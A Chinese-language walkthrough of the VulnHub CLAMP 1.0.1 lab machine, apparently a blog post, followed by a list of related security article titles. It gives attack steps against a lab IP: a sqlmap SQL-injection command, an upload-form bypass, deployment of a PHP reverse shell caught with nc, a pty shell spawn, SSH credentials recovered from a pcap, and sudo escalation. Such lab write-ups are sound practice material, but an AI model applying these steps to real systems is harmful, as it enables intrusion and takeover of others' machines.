【vulnhub】CLAMP 1.0.1靶机

信息收集

靶机发现

端口扫描

页面访问,并查看源码

访问 /nt4stopc/,下面有一些问题,提示必须收集答案

一些判断题,对与错对应1与0,最后结果为0110111001,拼接访问

点击图中位置,发现存在参数,php语言,尝试注入

是存在注入的,使用 sqlmap 跑一下

复制代码
python3 sqlmap.py -u "http://192.168.93.162/nt4stopc/0110111001/summertimesummertime/go.php?id=1" --batch --dbs

gereksiz 下得到一串值:

hihijrijrijr-balrgralrijr-htjrzhujrz-bfnf folder upload.php

解码后得到:

uvuvwevwevwe-onyetenyevwe-ugwemuhwem-osas

可能是路径,拼接访问

复制代码
http://192.168.93.162/nt4stopc/0110111001/summertimesummertime/uvuvwevwevwe-onyetenyevwe-ugwemuhwem-osas/

再拼接 upload.php

文件上传,以md5提交,但是没有提交按钮,自己在前端给加一个

<input type="submit">

获取shell

kali 生成反弹 shell

复制代码
locate php-reverse-shell.php
 
cp /usr/share/webshells/php/php-reverse-shell.php .
 
vim php-reverse-shell.php

上传该文件后,返回了文件路径,文件名为md5加密后的

nc监听,访问文件,成功反弹shell

提权

复制代码
python3 -c 'import pty;pty.spawn("/bin/bash")'

在 /var/www/html 下发现 important.pcapng,查看文件,发现内容

url解码,得到以下数据

复制代码
email=mkelepce&message=Hello there, The password for the SSH account you want is: mkelepce:mklpc-osas112. If you encounter a problem, just mail it.  Good work
 
账号密码:
mkelepce:mklpc-osas112.

ssh连接,连接成功

查看权限

sudo su 提权成功

相关推荐
思通数科AI全行业智能NLP系统1 小时前
AI视频技术赋能幼儿园安全——教师离岗报警系统的智慧守护
大数据·人工智能·安全·目标检测·目标跟踪·自然语言处理·ocr
明似水2 小时前
Flutter 弹窗队列管理:支持优先级的线程安全通用弹窗队列系统
javascript·安全·flutter
CYRUS_STUDIO4 小时前
使用 Dex2C 加壳保护 Android APK 代码
android·安全·逆向
一颗星星辰4 小时前
路由交换网络专题 | 第八章 | GVRP配置 | 端口安全 | 端口隔离 | Mux-VLAN | Hybrid
网络·安全
自由鬼4 小时前
高性能的开源网络入侵检测和防御引擎:Suricata介绍
网络·安全·网络安全·开源·系统安全·入侵检测
mon_star°7 小时前
搭建基于火灾风险预测与防范的消防安全科普小程序
安全·微信小程序·小程序·微信公众平台
神经毒素8 小时前
WEB安全--RCE--webshell bypass
网络·安全·web安全
程序猿chen11 小时前
量子跃迁:Vue组件安全工程的基因重组与生态免疫(完全体终局篇)
前端·vue.js·git·安全·面试·前端框架·跳槽
ALe要立志成为web糕手11 小时前
第十六周蓝桥杯2025网络安全赛道
安全·web安全·网络安全·蓝桥杯
w236173460111 小时前
Apache中间件解析漏洞与安全加固
安全·中间件·apache